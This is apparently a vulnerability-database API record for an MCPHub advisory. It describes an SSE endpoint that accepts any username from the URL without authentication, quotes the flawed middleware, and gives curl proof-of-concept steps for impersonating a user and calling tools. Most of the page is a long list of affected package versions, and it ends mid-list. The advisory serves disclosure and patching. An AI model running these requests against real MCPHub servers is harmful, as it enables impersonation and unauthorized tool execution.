Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/360472?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360472?format=api", "vulnerability_id": "VCID-3cmx-144n-mucv", "summary": "@samanhappy/mcphub: SSE Endpoint Accepts Arbitrary Username from URL Path Without Authentication, Enabling User Impersonation\n### Summary\n\nA critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user — including administrators — on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.\n\n### Details\n\nMCPHub provides user-scoped SSE endpoints at the path `/:user/sse/:group`. The `sseUserContextMiddleware` in `src/middlewares/userContext.ts` (lines 42–75) extracts the username from `req.params.user` and constructs a fabricated `IUser` object directly, bypassing all authentication:\n\n```typescript\nexport const sseUserContextMiddleware = async (\n req: Request, res: Response, next: NextFunction,\n): Promise<void> => {\n const userContextService = UserContextService.getInstance();\n const username = req.params.user; // ← Taken directly from URL, no validation whatsoever\n\n if (username) {\n // Note: In a real implementation, you should validate the user exists\n // and has proper permissions\n const user: IUser = {\n username, // ← Completely attacker-controlled\n password: '',\n isAdmin: false, // TODO: Should be retrieved from user database\n };\n\n userContextService.setCurrentUser(user); // ← Fabricated identity is accepted as real\n attachCleanupHandlers();\n console.log(`User context set for SSE/MCP endpoint: ${username}`);\n next();\n }\n // ...\n};\n```\n\nThe SSE routes in `src/server.ts` (lines 132–161) apply only rate limiting and this context middleware — there is no authentication middleware in the chain:\n\n```typescript\n// User-scoped routes with user context middleware\nthis.app.get(\n `${this.basePath}/:user/sse/:group(.*)?`,\n mcpConnectionRateLimiter, // Only rate limiting\n sseUserContextMiddleware, // Identity from URL — no auth\n (req, res) => handleSseConnection(req, res),\n);\n```\n\nAdditionally, `UserContextService` is a **singleton** that stores the current user in a single instance variable. Under concurrent connections, one user's context can silently overwrite another's, creating a secondary race condition vulnerability (CWE-362).\n\n### PoC\n\n**Prerequisites:** A running MCPHub instance with `enableBearerAuth: false` (or bearer keys not configured).\n\n**Step 1 — Connect to the SSE endpoint as any arbitrary user:**\n```bash\ncurl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse\n```\n\nExpected response — a valid SSE session is created:\n```\nevent: endpoint\ndata: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758\n```\n\n**Step 2 — Verify on the server side (server logs):**\n```\n[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated\n[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages\n[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated\n```\n\nThe server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.\n\n**Step 3 — Execute MCP tool calls under the spoofed identity:**\n\nOnce the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user's context:\n```bash\ncurl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \\\n -H 'Content-Type: application/json' \\\n -d '{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"tools/call\",\"params\":{\"name\":\"any-tool\",\"arguments\":{}}}'\n```\n\n### Impact\n\nThis is a **user identity spoofing** vulnerability on the MCP transport layer. Any unauthenticated network user can:\n\n- **Impersonate any user**, including administrators, on SSE/MCP endpoints\n- **Execute MCP tool calls** under a spoofed user's identity, potentially accessing user-scoped resources and data\n- **Poison audit logs** — all actions are recorded under the fabricated username, destroying accountability and forensic value\n- **Access user-scoped servers and groups** that should only be available to authenticated users\n\nAll MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.\n\nReported by the Eresus Security Research Team.", "aliases": [ { "alias": "GHSA-wf8q-wvv8-p8jf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/376136?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.15", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.15" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/861819?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/861820?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/861821?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/861822?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/861823?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/861824?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/861825?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/861826?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/861827?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/861828?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/861829?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/861830?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/861831?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/861832?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.14" }, { "url": "http://public2.vulnerablecode.io/api/packages/861833?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.15" }, { "url": "http://public2.vulnerablecode.io/api/packages/861834?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.16", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.16" }, { "url": "http://public2.vulnerablecode.io/api/packages/861835?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.17", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.17" }, { "url": "http://public2.vulnerablecode.io/api/packages/861836?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.18", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.18" }, { "url": "http://public2.vulnerablecode.io/api/packages/861837?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.20" }, { "url": "http://public2.vulnerablecode.io/api/packages/861838?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.21", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.21" }, { "url": "http://public2.vulnerablecode.io/api/packages/861839?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.22" }, { "url": "http://public2.vulnerablecode.io/api/packages/861840?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.23" }, { "url": "http://public2.vulnerablecode.io/api/packages/861841?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.24" }, { "url": "http://public2.vulnerablecode.io/api/packages/861842?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.25", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.25" }, { "url": "http://public2.vulnerablecode.io/api/packages/861843?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.26", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.26" }, { "url": "http://public2.vulnerablecode.io/api/packages/861844?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.0.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.0.27" }, { "url": "http://public2.vulnerablecode.io/api/packages/861845?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.5.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/861846?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.6.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/861847?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.6.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.6.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/861848?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.6.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.6.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/861849?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/861850?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/861851?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/861852?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/861853?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/861854?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/861855?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/861856?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.7.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.7.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/861857?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/861858?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/861859?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/861860?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/861861?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/861862?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/861863?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.6", 